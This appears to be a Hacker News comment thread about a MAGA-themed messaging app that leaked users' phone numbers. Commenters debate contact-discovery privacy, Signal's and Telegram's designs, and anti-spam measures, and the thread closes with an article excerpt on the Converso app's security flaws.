This might be the fault of opt-out serialization library (by default it serializes the whole object and you need to manually opt-out fields from it). So a programmer adds a field, forgets to add opt-out annotation and voilà.
Or they are just using plain JS dicts on the server and forgot to remove the key before using it in a response.
> The vulnerability they’re talking about was presented in a paper by researchers at the University of Vienna.
This vulnerability (mapping phone numbers to user id via rendevouz API) is old and was exploited in 2016 in Telegram [1] and allowed Iranian govt to build a phone book of 15M Telegram users. The paper also mentions that the vulnerability was known in 2012, still not fixed.
Obviously ratelimiting is a separate and important issue in api management.
The thing about building secure systems is that there are a lot of edges to cover.
It may not be pertinent to the subject, but clearly I have found a kindred spirit in this author.
Have they?
A sentence clipped from a point a little past the introduction, but catchy nevertheless.
I suspect there will be more than "tens of readers" shortly.
Is this an actual quote? Because it sounds like a standup joke.
I’m glad I have never heard of this app.
Security and trust go hand in hand.
I'd only have 20 cents, which I guess is good. But I'm sure there's more I'm forgetting.
Related:
[1] https://news.ycombinator.com/item?id=44684373
The real lesson: assume every service will eventually leak something. Use unique passwords everywhere, enable 2FA, and rotate credentials after breaches.
The tedious part is the rotation. I've seen people skip it because manually changing 50+ passwords is brutal. Automation helps but needs to be done securely (local-only, zero-knowledge).
The website doesn't really spark any confidence.
Never heard of it and I'd be surprised if they have more than 100 users.
Never heard of the wrench technique? It's always gonna work out great. Way cheaper and easier than "wizardy" too.
but after having seen IRL people accidentally overlooking very basic things I now (since a few years) think using them is essential, even through they often suck(1).
(1): Like due to false positives, wrong severity classifications, wrong reasoning for why something is a problem and in generally not doing anything application specific, etc.
I mean who would be so dump to accidentally expose some RCE prone internal testing helper only used for local integration tests on their local network (turns out anyone who uses docker/docker-compose with a port mapping which doesn't explicitly define the interface, i.e. anyone following 99% of docker tutorials...). Or there is no way you forget to set content security policies I mean it's a ticket on the initial project setup or already done in the project template (but then a careless git conflict resolution removed them). etc.
In a previous job, on my first audit of the code, I spotted such vulnerabilities pretty much everywhere.
Developers simply need to stop using these libraries.
I keep seeing people try to explain away incompetence by blaming unaccountable things aka the tool or system. Exposed password? Must be the library. People really should stop using it. No, the library is not wrong, ppl should be better developers.
Peer reviewed paper is full of AI slop, must not be the reviewer’s fault, the citations were there, they were just fake. What is going on?
"Hey, _we_ don't store your contacts, we are good! Instead you have to manage them yourself, and in process share your presumably "secure" Signal contact list with Apple, Google, Facebook phone carriers and everyone else. But it's not on our servers, so we don't care"
That said, the analysis itself is interesting and worth a look, if nothing else it's a general pattern you can follow for many chat applications to see how secure it is.
> Neither of us had prior experience developing mobile apps, but we thought, “Hey, we’re both smart. This shouldn’t be too difficult.”
I think, 40 years from now when we're writing about this last decade or so of software development, this quote is going to sum it all up.
looks at Signal
Oh.
Original title is: “Super secure” MAGA-themed messaging app leaks everyone’s phone number
I think that's incredibly important context. Instead of conferring with actual experts in the field, the populist, fascist segment of our society just decided to wing it with technology.
They BELIEVED they were more secure, with no evidence to back it up.
I don’t take any offense , but I do have high standards for this forum and cringe comments make me less likely to hang out here
He makes it sound he's on some sort of a mission...like the users of the messaging app ( which I have never heard of before until today ) should face some sort of backlash for their own political views opposite of him....which is amusing to say the least as Canadians seem to have permanently marked conservatives, not just in their own country but all over the world as "MAGA".
also I'd appreciate if we can keep politics out which just detracts focus on technical end of things
Lots of things are really simple. But you have to know about them first.
"Yeah but it wasn't in the docker tutorial I skimmed so I have no idea what it means."
While slightly unrelated, I thought, how we can fix this for truly secure and privacy-aware, non-commercial communication platforms like Matrix? Make it impossible to build such mapping. The core idea is that you should be able to find the user by number only if you are in their contact list - strangers not welcome. So every user, who wishes to be discovered, uploads hash(A, B) for every contact - a hash of user's phone number (A) and contact's phone number (B), swapped if B < A. Let's say user A uploaded hashes h(A,B) and h(A,C). Now, user B wishes to discover contacts and uploads hashes h(A, B) and h(B, D). The server sees matching hashes between A and B and lets them discover each other without knowing their numbers.
The advantages:
- as we hash a pair of 9-digit numbers, the hash function domain space is larger and it is more difficult to reverse the hashes (hash of a single phone number is reversed easily)
- each user can decide who may discover them
Disadvantages:
- a patient attacker can create hashes of A with all existing numbers and discover who are the contacts of A. Basically, extract anyone's phone book via discovery API. One way to protect against this would be to verify A's phone number before using discovery, but the government, probably, can intercept SMS codes and pass the verification anyway. However, the government can also see all the phone calls, so they know who is in whose phone book anyway.
- if the hash is reversed, you get pairs of phone numbers instead of just one number
Do you have further reading on this?
we consistently have data breaches in institutions we trust is converging to a point where its literally just a data harvesting ops and everybody stops caring. They won't even bother to join class action lawsuits anymore because the rewards enrich the lawyers while everybody gets their twenty bucks in the mail after providing more personal data to the law firm its like a loophole.
we now have legalized insider trading in the form of "prediction markets", legalized money laundering and pump and dump through crypto, all of these always lead to failures for the participant disguised as wins.
It looks like "Freedom" is a sure thing.
* github.com/maqp/tfc
There's a general zeitgeist of "Experts don't know what they're talking about" that has fed both pieces of this space. It's an Age of Doubt, as it were, but the hubristic kind of doubt, not the questing kind.
But for a commercial messaging app you expect better...
Well obviously we can't be seen as non-neutral (I wish I would be joking, but I have a feeling that is the thought process on a good day)
Great example of how perception and reality can differ vastly
It’s a compromise meant to propagate the network, and it has a high degree of utility to most users. There are also plenty of apps that are de-facto anonymous and private. Signal is de facto non-anonymous but private, though using a personally identifiable token is not a hard requirement and is trivial to avoid. (A phone number of some kind is needed once for registration only)
That… is not a real degree.
>"Now, anyone who has read Mindset by Carol Dweck, Grit by Angela Duckworth, or The Brain That Changes Itself by Norman Doidge, M.D., knows that you can be, do, and have whatever you want."
The gap between "read" and "understood" swallows so many. Also, did he use TR's "Man in the Arena" quotation? Reader, of course he did.
"ChatGPT, write an essay about software development during the smartphone social networking boom. Find a good quote to sum it all up."
The turning point was smartphones. No, they don't clandestinely listen to the audio, or smuggle tower locations of unimportant people. But (all of our) behavior changes when we rely on an app and give up those other liberties because app. Some social engineering was required for mass adoption thereof, and most of us here are acquainted with the analytical means to concentrate delivering that. Half of our society has weaknesses that we euphemize as "gaming habits" or "addictive personalities". Maybe they know it; I'm not down here haughtily scoffing that they cannot know it.
China and Russia and North Korea don't show those weaknesses because those people are down in the mines. The powers learned social engineering within their closed societies, not in our open societies. They promote a nation and a people unified with one personality. The United States and similar freedom exponents have to contend with attracting the world's talent by explicitly tolerating any personality. At least for now
This is an app specifically built for a specific political group, a group that is wreaking havoc on our science and technology. "MAGA" has become the go-to term for a global movement, because there is a global alt-right movement to undo progress and dominate others into their world view.
It's going to be a part of HN like it was the first go around. Being apolitical is how political groups like this come to power.
Meanwhile, Matrix for now does support hashed contact lookup, although few clients implement it given the privacy considerations at https://spec.matrix.org/unstable/identity-service-api/#secur...
The data Signal has is: 1) registration time for a given phone number, 2) knowledge of daily login (24hr resolution). That's it. That's the metadata.
They do not have information on who is communicating with who, when messages are sent, if messages are sent, how many, the size, or any of that. Importantly, they do not have an identity (your name) associated with the account nor does that show for contacts (not even the phone number needs be shared).
Signal is designed to be safe from Signal itself.
Yes, it sucks that there is the phone number connected to the account, but you can probably understand that there's a reason authorities don't frequently send Signal data requests; because the information isn't very useful. So even if you have a phone number associated with a government ID (not required in America) they really can only show that you have an account and potentially that the account is active.
Like the sibling comment says, there's always a trade-off. You can't have a system that has no metadata, but you can have one that minimizes it. Signal needs to balance usability and minimize bots while maximizing privacy and security. Phone numbers are a barrier to entry for bots, preventing unlimited or trivial account generation. It has downsides but upsides too. One big upside is that if Signal gets compromised then there's can be no reconstruction of the chat history or metadata. IMO, it's a good enough solution for 99.9% of people. If you need privacy and security from nation state actors who are directly targeting you then it's maybe not the best solution (at least not out of the box) but otherwise I can't see a situation where it is a problem.
FWIW, Signal does look to be moving away from phone numbers. They have usernames now. I'd expect it to take time to completely get away though considering they're a small team and need to move from the existing infrastructure to that new one. It's definitely not an easy task (and I think people frequently underestimate the difficulty of security, as quoted in the article lol. And as suggested by the op: it's all edge cases)
My Signal number is a Google Voice number that has nothing to do with any mobile phone. The Google account has advanced protection turned on so you can’t port it or get the SMSes without a hardware login token.
Simplex was a decent option but they're going down the crypto rabbit hole and their project lead is...not someone who should be trusted by anyone in the crosshairs right now.
Phreeli [https://www.phreeli.com/] allows you to get a cell number with just a zip code. They use ZKP (Zero Knowledge Proofs) for payment tracking.
Should have deleted my account instead of just removing the app, because it turns out the difference between using signal and using SMS is obscured for most phones, and when people thought they were texting me they weren't. I was just out of contact for a long time as people kept sending me the wrong kind of messages. I suppose one could argue protecting contact/identity is not a real goal for e2e encryption, but what I see is a "privacy oriented" service that's clearly way too interested in bootstrapping a user base with network effects and shouldn't be trusted.
Also, average Joe is not using proxy to hide the IP-address of their device so they leak their identity to the server anyway. Signal is not keeping those logs so that helps.
Messaging apps cater to different needs, sometimes you need only content-privacy. It's not a secret you're married to your partner and you talk daily, but the topics of the conversation aren't public information.
When you need to hide who you are and who you talk to (say Russian dissident group, or sexual minorities in fundamentalist countries), you might want to use Tor-exclusive messaging tools like Cwtch. But that comes at a near-unavoidable issue of no offline-messaging, meaning you'll have to have a schedule when to meet online.
Signal's centralized architecture has upsides and downsides, but what matters ultimately is, (a) are you doing what you can in the architectural limitations of the platform (strong privacy-by-design provides more features at same security level), and (b), are you communicating the threat model to the users so they can make informed decision whether the applications fits their threat model.
We know from subpoenas that signal only holds the user phone number, creation timestamp, and last login timestamp. That’s it.
Signal provides content-privacy by design with E2EE. Signal provide metadata-privacy by policy, i.e. they choose to not collect data or mine information from it. If you need metadata-privacy by design, you're better off with purpose-built tools like Cwtch, Ricochet Refresh, OnionShare, or perhaps Briar.
To cut it short they use Intel SGX to create a "trusted environment" (trusted by the app/user) in which the run the contact discovery.
In that trusted environment you then run algorithms similar to other messengers (i.e. you still need to rate limit them as it's possible to iterate _all_ phone numbers which exist).
If working as intended, this is better then what alternatives provide as it doesn't just protect phone numbers from 3rd parties but also from the data center operator and to some degree even signal itself.
But it's not perfect. You can use side channel attacks against Intel SGX and Signal most likely can sneak in ways for them to access things by changing the code, sure people might find this but it's still viable.
In the end what matters is driving up the cost of attacks to a point where they aren't worth in all cases (as in either not worth in general or in there being easier attack vectors e.g. against your phone which also gives them what they want, either way it should be suited for systematic mass surveillance of everyone or even just sub groups like politicians, journalists and similar).
It's not laziness. It's populism rejecting what they consider elitism, which includes expertise and experience.
But the way it's phrased and worded... at best, it's the kind of really bad typo that shows rank incompetence; at worst, it's outright fabrication that is actively lying about the credentials; and what I think most likely, it's obfuscation that's relying on credentialism to impart an imprimatur of credibility that is wholly undeserved (i.e. "I got an unrelated degree at Stanford, but it's Stanford and how could anyone who goes there be bad at CS?").
Especially just being able to run my own service will be priceless when something like chatcontrol eventually makes it through. Signal can only comply or leave, but they'll never manage to kill all the matrix servers around.
There should never be a need to return a pin to the client. You’ve already texted/emailed it to them. They are going to send it back to you. You will check against your temporary storage, verify/reject, and delete it immediately after.
Seems like it was working as designed, if you don't want any app to get your contact info don't share your contact info to anyone ever. Eventually they will share that info with any app.
Now that this crucial adoption feature has been removed, it makes zero sense for Signal to continue to rely on phone numbers. Since that feature has been removed, the utility of Signal has been lost anyway and many in my groups returned to regular SMS. So the system is already compromised from that perspective. At least forks such as Session tried to solve this (too bad Session removed forward secrecy and became useless)
Also, Telegram is not private.
1. It's not E2EE by default
2. It's not E2EE for groups on any platfrom
3. It's not E2EE 1:1 on desktop clients forcing you to downgrade from secret chats to insecure chats
4. It's collecting 100% of your metadata, including
* who you talk to, when, how much, what type of data you exchange,
* your IP-address which sort of defeats the purpose of having no phone number, and
* when you enable secret chats
Telegram is also not transparent about its funding, about who develops it, and who has access to the plaintexts stored on their server (meaning, anyone with a zero day or two).
Journalists who went to look for Telegram's office in Dubay found out no-one in the neighboring office had ever seen Telegram staff enter the space https://www.youtube.com/watch?v=Pg8mWJUM7x4
Telegram was built with blood-money from VKontakte, and Durov has been marketed as living in exile, when in reality he has visited Russia on average once every 2.4 months since the exile began, and strangely Durov has not had his underwear poisoned and windows have been kind to him despite supposedly betraying Putin's interests.
tl;dr Telegram reeks of FSB/SVR honeypot.
If you reject the best and only easy option from the outset because you don’t want actual healthcare, then yeah… whatever remains is going to be “hard”.
What the US has right now is a complex entrenched system of financial middlemen that refuse to abandon their rent seeking. They provide only(!) financial “services” and will fight actual healthcare tooth and nail.
Trump wasn’t strong enough — or simply didn’t care enough — to fight these people.
Ultimately, you're just buying time, generating tamper evidence in the moment, and putting a price-tag on what it takes to break in. There's no "perfectly secure", only "good enough" to the tune of "too much trouble to bother for X payout."
(I would be thrilled to learn that this changed, but it has been in place for many years and it's kinda hard to personally test)
What's wrong with account generation? Nothing. The problem is if they start sending spam to random people. So we can make registration or adding contacts paid (in cryptocurrency) and the problem is gone.
> Does Signal protect from the scheme when the government sends discovery requests for all existing phone numbers (< 1B) and gets a full mapping between user id and phone number?
Signal does have the phone numbers, as you say. Can they connect a number to a username?
Those people already had your contact info, probably.
Also, I think there is a setting in Signal to prevent that - and via the OS you can block Signal's access to your contacts, of course.
That Signal did none of those things implies that privacy was not their objective. Only secure communications was.
It's possible that the reason behind their anti-privacy stand is strategic, to discourage criminal use which could be used as a vector of attack against them. Doesn't change the fact that Signal is demonstrably anti-privacy by design.
I asked because both political parties have chapters at national, regional, state & local levels so "GOP job board" on the face wasn't clear which organization was running it. Some parties cover rural counties of just a few thousand people.
I was aware of all this before, but the experience has tainted my opinion even further of higher education. Graduates of the for-profit tech school are likely to face professional discrimination, while students from the more prestigious university will receive interviews and opportunities because of a name listed on their resume.
Signal is just much smaller in terms of users so the potential value is lower.
>Telegram reeks of FSB/SVR honeypot
Btw interesting connection between Durov/TON and Jan Marsalek (alleged Russian spy) was recently uncovered by FT:
>In 2018 Marsalek invited Ben Halim and other backers of the Libya projects to invest in a new crypto token being launched by messaging platform Telegram, whose founder Pavel Durov had met Marsalek and invited him to participate.
>A special purpose vehicle was set up for them to pool their money and invest but Credit Suisse, which was organising the sale of the token, blocked the transaction. It turned out the bank was happy to take money from Marsalek, whose role in the biggest corporate fraud in recent European history had yet to be revealed, but was wary of his Libyan friends.
>As a workaround, Ben Halim and others decided to let Marsalek invest their money in his name, sidestepping Credit Suisse’s money laundering checks. However, the US Securities and Exchange Commission blocked Telegram’s issuance of the tokens and Marsalek refunded his Libyan associates.
- verify the attestation
- make sure it means the code they have published is the attested code
- make sure the published code does what it should
- and catch any divergence to this *fast enough* to not cause much damage
....
it's without question better then doing nothing
but it's fundamentally not a perfect solution
but it's very unclear if there even is a perfect solution, I would guess due to the characteristics of phone numbers there isn't a perfect solution
https://play.google.com/store/apps/details?id=com.freedomcha...
I think Telegram is filth as much as the next guy, but I'm just making that technical point.
They are likely a bit of both, increasingly more so going forward.
- some checks are straightforward and it would be dumb to use AI for them
- some checks require AI
What's right with it? Accounts being generated (i.e. many inauthentic accounts controlled by few people) are always used to send spam, there are no exceptions. The perpetrators should be in prison.
discoverability does default to "on", but there is an opportunity to disable it during registration, which prevents those notifications.
> What's wrong with account generation?
Your comment *literally* explains one issue... > That doesn't answer the GP question:
It does.They asked
>>> Does Signal protect from the scheme when the government sends discovery requests for all existing phone numbers (< 1B) and gets a full mapping between user id and phone number?
Which yes, this does protect that. There is no mapping between a user id and phone number. Go look at the reports. They only show that the phone number has a registered account but they do not show what the user id is. Signal doesn't have that information to give. > Can they connect a number to a username?
From Signal Usernames in Signal are protected using a custom Ristretto 25519 hashing algorithm and zero-knowledge proofs. Signal can’t easily see or produce the username if given the phone number of a Signal account. Note that if provided with the plaintext of a username known to be in use, Signal can connect that username to the Signal account that the username is currently associated with. However, once a username has been changed or deleted, it can no longer be associated with a Signal account.
This is in the details on[0] right above the section "Set it, share it, change it"So Signal cannot use phone numbers to identify usernames BUT Signal can use usernames to identify phone numbers IF AND ONLY IF that username is in active use. (Note that the usernames is not the Signal ID)
If you are worried about this issue I'd either disable usernames or continually rotate them. If the username is not connected with your account at the time the request is being made then no connection can be made by Signal. So this is pretty easy to thwart, though I wish Signal included a way to automate this (perhaps Molly has a way or someone can add it?) Either rotating after every use or on a timer would almost guarantee that this happens given that it takes time to get a search warrant and time for Signal to process them. You can see from the BigBrother link that Signal is not very quick to respond...
1. were unable to communicate effectively, or
2. used no security at all.
Do you really use a communication system where you have all exchanged private keys in person and where even the fact that you use it is hidden from your government and phone operator?
Not even. If you actually try you will discover at the last step (after full KYC, signing some dubious agreements, and linking an existing TG account) that the Fragment "market" is actually fully centralized and has not been open for new buyers-users for a good while. No secondary markets out there (maybe not even possible on their network) afaik.
They want us to _not talk_ about what they are doing so we _remain ignorant of each other_ think about what they are doing, so they can get away with more
Definitely, because I never said they weren’t and certainly don’t believe that — I know too many smart conservatives for that. That’s a big part of the problem: smart people can put a lot of effort into constructing rationalizations so when they’re immersed in a culture where political correctness trumps objectivity they’ll construct elaborate narratives to support the ideologically useful outcome.
The relevance to security is that these people are more vulnerable because they can’t tell charlatans who appear to be on their side apart from people who actually know what they’re talking about. There are tons of right-leaning people in tech but as we saw with election fraud claims, the competent ones know it’s risky to contradict the narrative and stay quiet rather than being accused of being RINOs. It’s similar to how things like MLM scams spread in religious communities if you have experience with that, where things usually have to get pretty bad before someone is willing to criticize a friendly member of their congregation.
The majority of the user base would be gone, too.
I had a hard enough time convincing my friend group to use Signal as is. If they had to pay (especially if it had to be via cryptocurrency) none of them would have ever even considered it.
The CEO vanished from the discussion (again) so my proposals to improve ease of use of Tor never reached them. You can catch up on the discussion at https://discuss.privacyguides.net/t/simplex-vs-cwtch-who-is-...
It's not hard to do so, so if they're having difficulty doing that, what other simple things are they having difficulty with? Why would anyone hinge their safety and well being on the whims of such a person?
I say this as a person who bought into the initial concept, and who has used it myself.
What leaked was that I was a signal user, and that the person on the other side was a signal user. The security implications are obvious, and by itself, that's already enough to get someone who really needs to care about privacy killed.
> Also, I think there is a setting in Signal to prevent that
False. It happened without my permission as soon as the app was installed, and there was no way to opt out. Maybe they changed it since then, but the fact remains they obviously cared more about network-effects and user-counts than user privacy.
Sigh, there's just no need for this kind of apologism. You could just admit that a) it's bad behavior, b) they did it on purpose, and c) it's not possible to trust someone who does something like this. I'm aware they are nonprofit, so I don't know why it's like this, but the answer is probably somewhere in the list of donors.
> privacy was not their objective. Only secure communications was.
> Signal is demonstrably anti-privacy by design.
But your second is uncharitable and misses Signal's historical context.
The value of a phone number for spam prevention has been mentioned, but that's not the original reason why phone numbers were central to Signal. People forget that Signal was initially designed around using SMS as transport, as with Twitter.
Signal began as an SMS client for Android that transparently applied encryption on top of SMS messages when communicating with other Signal users. They added servers and IP backhaul as it grew. Then it got an iOS app, where 3rd party SMS clients aren't allowed. The two clients coexisted awkwardly for years, with Signal iOS as a pure modern messenger and Signal Android as a hybrid SMS client. Finally they ripped out SMS support. Still later they added usernames and communicating without exposing phone numbers to the other party.
You can reasonably disdain still having to expose a phone number to Signal, but calling it "anti-privacy by design" elides the origins of that design. It took a lot of refactoring to get out from under the initial design, just like Twitter in transcending the 140-character limit.
I think we've all been the one who got fooled in some relationship. Maybe for you it wasn't a political party. But I bet it still hurt.
Perfect privacy would mean not sending any messages at all, because you can never prove the message is going to the intended recipient. Any actual system is going to have tradeoffs, calling Signal anti-privacy is not serious, especially when you're suggesting cryptocurrency as a solution.
A ZKP system where you make a public record of your zero-knowledge proof sounds anti-privacy to me. Even if you're using something obfuscated like Monero, it's still public. I see where you're coming from, but I think I would prefer Signal just keep a database of all their users and promise to try and keep it safe rather than rely on something like Monero.
So who's doing the computation? The spammer can't afford to run 3 second key derivation time per spam device? Or how long do you think normal user will wait while you burn their battery power before saying "Screw it, I'll just use WA"? Or is this something the server should be doing?
>Captcha
LLMs are getting quite good at getting around captchas.
>invite-code system
That works in lobste.rs when everyone can talk together, and recruit interesting people to join the public conversation. Try doing that with limited invites to recruit your peers to build a useful local network of peers and relatives. "I'm sorry Adam, I'm out of invites can you invite my mom's step-cousin, my mom needs to talk to them?"
>Signal's architects already knew that when they started designng it.
I think they really did, and they did what the industry had already established as the best practice for a hard problem.
The only reasonable alternative would've been email with heavy temp-mail hardening, or looking into the opposite end of Zooko's triangle and having long, random, hard-to-enumerate usernames like Cwtch and other Tor-based messengers do. But even that's not removing the spam-list problem of any publicly listed address ending up in a list that gets spammed with contact requests or opening messages with spam.
I thought the general belief (e.g., '“Proof-of-Work” Proves Not to Work') was that proof-of-work isn't very good anti-spam.
> or a Captcha
Aren't bots better at those than humans by now?
And making people do captchas in an instant messenger is a great way to make people not use that instant messenger.
> or an invite-code system like lobste.rs or early Gmail.
That's not a long-term option if you want to make something mainstream.
For every example of Maga group think, I can think of an example of Obamaphile group think.
And if the contrarian / doubtful end of the spectrum ( all elites are nefarious) is bad, doesn't that imply that the gullible / trusting end of the spectrum (all elites & academics are benevolent) is also bad?
The roles are just a mirror of each other. You're just picking sides -- which is how things usually operate.
Probably because it has always been trivial to proxy Tor with build in and supported socks5
Clearly, either this was before Signal had its username-lookup-only feature, or you opted into letting people find you by your phone number. At that point, the information is already effectively leaked in the same way (it’s easy for anyone to enumerate all phone numbers, let alone for you to enumerate your own contacts or vice versa), and if the notification surprised you then the absence of the notification would simply have been giving you a false sense of security.
Communication by non-phone-number identifiers is critically important, and I’m glad for recent Signal developments in that direction and hopeful for more in the future, but opting into phone-number-based communication and complaining that your contacts were merely notified about the communication option they would have been able to access anyway on a security or privacy basis is silly. The fact that this information (your contacts) passes through Signal is much more objectionable to me, even though they do the SGX thing, and I would never recommend allowing it access to your contacts for that reason.
I liked the SimpleX concept, but would prefer its relay server were replaced by Tor or i2p network.
And if they used Signal instead of NIH protocol.
Actually, the only unique SimpleX feature I really like is that it uses separate ids for every connection and group.
I understand the unease about the notifications, but there are some hard tradeoffs between how you can store as little information as possible, remain as decentralized as possible, while getting the same benefits as centralized systems like Facebook.
I'm really of the opinion that a messenger similar to Signal but more centralized in the fashion of WhatsApp or even Facebook Messenger should exist, but I also understand why Signal works the way it does.
I have yet to see any of that while just using the app. Do you think people owning a project should not be allowed to have and share there options about anything but the project?
> You can reasonably disdain still having to expose a phone number to Signal, but calling it "anti-privacy by design" elides the origins of that design.
They introduced usernames without removing the requirement for phone numbers.
I rest my case.
You never questioned it wasn’t a real service. When confronted you pretend it doesn’t matter that it’s a security lapse in a tiny no name project.
Groups in messaging apps rarely contain more than 100 users. So invite codes can work well for messaging apps.
You want constant ideological battles to end, and the answer is... do nothing?
They have the megaphone. If you want to take it away, we have to talk to each other about it so they start marginalizing their posts and opinions. MAGA is the poster child for the Overton shift, it's not going back any amount without effort
If it consistently happens more often for any given political faction, then it's still not an ideological statement, just a realization that not every political direction has an equal commitment to facts and reality.
So, mostly, I'd like the alt-stupids to not take over.
They have exactly that. They rely on TPMs for "privacy" which is not serious.
> Perfect privacy would mean not sending any messages at all
Not sending messages is incompatible with secure messaging which is the subject of the discussion...
> ZKP system where you make a public record of your zero-knowledge proof sounds anti-privacy to me.
A zero-knowledge proof provably contains zero information. Even if you use a type of ZKP vulnerable to a potential CRQC it's still zero information and can never be cracked to reveal information (a CRQC could forge proofs however).
> especially when you're suggesting cryptocurrency as a solution
Would you elaborate on why cryptocurrencies are not a solution? Especially if combined with ZKPs to sever the connection between the payment and the account. When combined with ZKPs, they could even accept Paypal for donations in exchange for private accounts.
The user's device has to do the computation for it to be effective. How long does it normally take to sign up for a new messaging service like WhatsApp? Five minutes? You should burn the user's cellphone battery for about half that long, 150 seconds, 50 times more than you were thinking. Plus another half-minute every time you add a new contact. Times two for every time someone blocks you, up to a limit of 150 seconds. Minus one second for each day you've been signed up. Or something like that.
The value of signing up for Signal is much higher to a real user than it is to a spammer, so you just have to put the signup cost somewhere in the wide range in between.
LLMs didn't exist when Signal was designed, and Captchas still seem to be getting a lot of use today.
Invite codes worked fine for Gmail, and would work even better for any kind of closed messaging system like Signal; people who don't know any users of a particular messaging system almost never try to use it. The diameter of the world's social graph is maybe ten or twelve, so invite codes can cover the world's social graph with only small, transitory "out of invites" problems.
The "industry" had "established" that they "should" gather as much PII as possible in order to sell ads and get investments from In-Q-Tel.
Bots may be better than humans at Captchas now, although I'm not certain of that, but they certainly weren't when Signal was designed.
I don't see why invite codes would be a problem for mainstream use.
Signal mostly.
>separate ids for every connection and group
The thing is, there's Akamai and Runonflux, two companies hosting the entire public SimpleX infrastructure. If you're not using Tor and SimpleX Onion Services with your buddies, these two companies can perform end-to-end correlation attacks to spy on which IPs are conversing, and TelCos know which IPs belong to which customers at any given time. Mandatory data retention laws about the assigned IPs aren't rare.
Most people would not, though, and that's the issue.
Yeah, no. The whole "every perspective has some validity" thing won't really apply to most safety/security issues. The most charitable thing to say here is that the workflow is completely broken. Less charitable but also valid is pointing out that it's actively harmful, and deliberate. I would be really surprised if this hadn't ever caused serious consequences whether a whistle blower was fired, an abused spouse got extra abused, or an informant was killed. If you think you've got a "valid perspective" that prioritizes mere user-discovery over user-safety, then you should not be attempting work that's close to safety and security, full stop.
Back in 2004, sure. Today, Gmail asks you for a phone number when signing up because of the spam problem.
If you actually do that you're going to crash a lot of cellphones and people will rightly blame your app for being badly coded.
Yeah, what could I possibly know about secure messaging.
>Plus another half-minute every time you add a new contact.
Can you point to some instant messaging app that has you wait 30 seconds before talking to them? Now niché is it?
You want proper uptake and accessibility to everyone, you need something like Samsung A16 to run the work in 150 seconds. Some non-amateur spammer throws ten RTX 5090s to unlock access to random accounts at 80x parallelism (capped by memory cost), with the reasonable time cost of whatever iterations that is, with quite a bit shorter time than 150 seconds. 121.5GFLOPs vs 10x104.8 TFLOPs leads to overall performance difference of 8,800x. And that account is then free to spam at decent pace for a long time before it gets flagged and removed.
The accounts are not generated in five minutes per random sweat shop worker: https://www.youtube.com/watch?v=CHU4kWQY3E8 has tap actions synced across sixty devices. And that's just to deal with human-like captchas that need to show human-like randomness. Proof-of-work is not a captcha, so you can automate it. Signal's client is open source for myriad of reasons, the most pressing of which is verifiable cryptographic implementations. So you can just patch your copy of the source to dump the challenge and forward it to the brute force rig.
Either the enumeration itself has to be computationally infeasible, or it has to be seriously cost limited (one registration per 5 dollar prepaid SIM or whatever).
>Invite codes worked fine for Gmail
Yeah and back in ~2004 when Hotmail had 2MB of free storage, GMail's 1,000MB of free storage may have also "helped".
Waze was also invite-only, G+ was initially invite only. Did that model help or hurt them?
I'm not saying you're wrong, but I have no idea what you're getting at, because the sentence sounds kind of absurd. As a result, I'm not sure if it addresses your point, but just to throw it out there: Bitcoin and anti-spam are different applications of proof of work. Anti-spam has to strike a compromise between being cheap for the user (who is often on relatively low-powered mobile hardware), and yet annoying enough to deter the spammer. It's not unreasonable to believe that such a compromise does not exist.
> Bots may be better than humans at Captchas now, although I'm not certain of that, but they certainly weren't when Signal was designed.
Fair point, but again, even in 2014, an instant messenger with captchas would have much more friction than every other messenger. And captchas aren't just bad because they introduce enough friction to drive away pretty much everybody: they also make users feel like they're being treated as potential criminals.
> I don't see why invite codes would be a problem for mainstream use.
Can you elaborate? Invite codes blocking access to the service itself "like lobste.rs" mean that no one can use your service unless they've been transitively blessed by you. That's obviously going to limit its reach...
Different system. The parent and GP are talking about proof-of-work being used directly for account creation. If a chat service required mining-levels of PoW (and hence any prospective new users to have an ASIC), it would not be very popular. Nor would it be very popular if it used a relative difficulty system and the spammers used dedicated servers while the legitimate users had to compete using only their phones.
As long as IP leaks are possible, I'd rather also use Signal, where at least the rest is battle tested and state of the art.
My concern with Signal is they'll either comply or move out of the EU with the incoming Chat Control, and I'd rather have a fully decentralized messenger with as few leaks as possible.
> Not a very good case made since you obviously didn’t read the parent discussion.
This isn't an argument, do you have anything to back up your assertion?
> Yeah, no.
Nobody reads past this part. It reflects a lack of judgment, and also who wants to talk to someone in this context?
I don't think a Captcha for signup would have been much friction. Certainly less than providing a phone number.
Why would someone want to use a closed messaging service like Signal unless they knew an existing user? I don't think that the requirement for that existing user to invite them would be a significant barrier. So I think it's not going to limit its reach.
G+ didn't have that problem so much, but I don't remember it using invite codes.
But that would still put the CPM of the spam around US$2, which very few spammers can afford. Maybe mesothelioma lawyers and spearphishers.
You don't have to make spamming physically impossible, just unprofitable.
Notice that if you go this route you get no additional safety, and actually introduced an extra hazard.. don't lean in or your goggles get caught in the machine and drag your neck closer to whirling blades! Sorry if it's rude, but there's no nice way to say that this is bad to do and even worse to advocate for. If you don't get it, ok, go be as unsafe as you want when it's your ass on the line. No need to take the next step towards also trying to kill safety culture.
And broadcasting on FM radio is then what?
You’re just redefining words, there’s no need for this. We agree it would be better from a privacy point of view if Signal did not require a phone number but you’re nit picking: it’s a one time thing, and you can take a public phone that no one can associate with you for this. And then never need it again if you have proper backups.
In the case of Twitter, there is evidence that the initial implementation was meant to just be a security mechanism but later someone else noticed they had a handy database of user phone numbers and decided to treat them as free marketing contact information.
If you're saying that the account creation flow through the system accounts application doesn't require a phone number, how are you sure that Google doesn't just collect the phone number directly from your device (they could even silently verify it through a class-0 silent SMS)?
Does it also not ask for a phone number if you factory reset, remove the SIM card, and do not register the phone with a Google account? Maybe they track the IMEI instead?
Neither of us had prior experience developing mobile apps, but we thought, “Hey, we’re both smart. This shouldn’t be too difficult.”
Once upon a time, in the distant memory that is 2023, a new instant messaging app called Converso was launched. Converso made some pretty impressive claims about its security: it claimed to implement state of the art end-to-end encryption, to collect no metadata, and to use a decentralized architecture that involved no servers at all. Unfortunately, security researcher crnković did some basic reverse engineering and traffic analysis and found all of these claims to be completely baseless, with Converso collecting plenty of metadata on every message and using a third-party E2EE provider to store messages on bog standard centralized servers. Even more unfortunately, crnković also found that Converso implemented the (perfectly functional if used properly) Seald E2EE service in such a way that encrypted messages’ keys could be derived from publicly available information, and also uploaded a copy of every encrypted message to an open Firebase bucket, meaning every message ever sent on the service could be trivially read by anyone with an Internet connection. After being informed of the vulnerabilities, Converso initially released an update claiming to fix them, then withdrew from the App Store and Google Play to “address and improve the issues.”
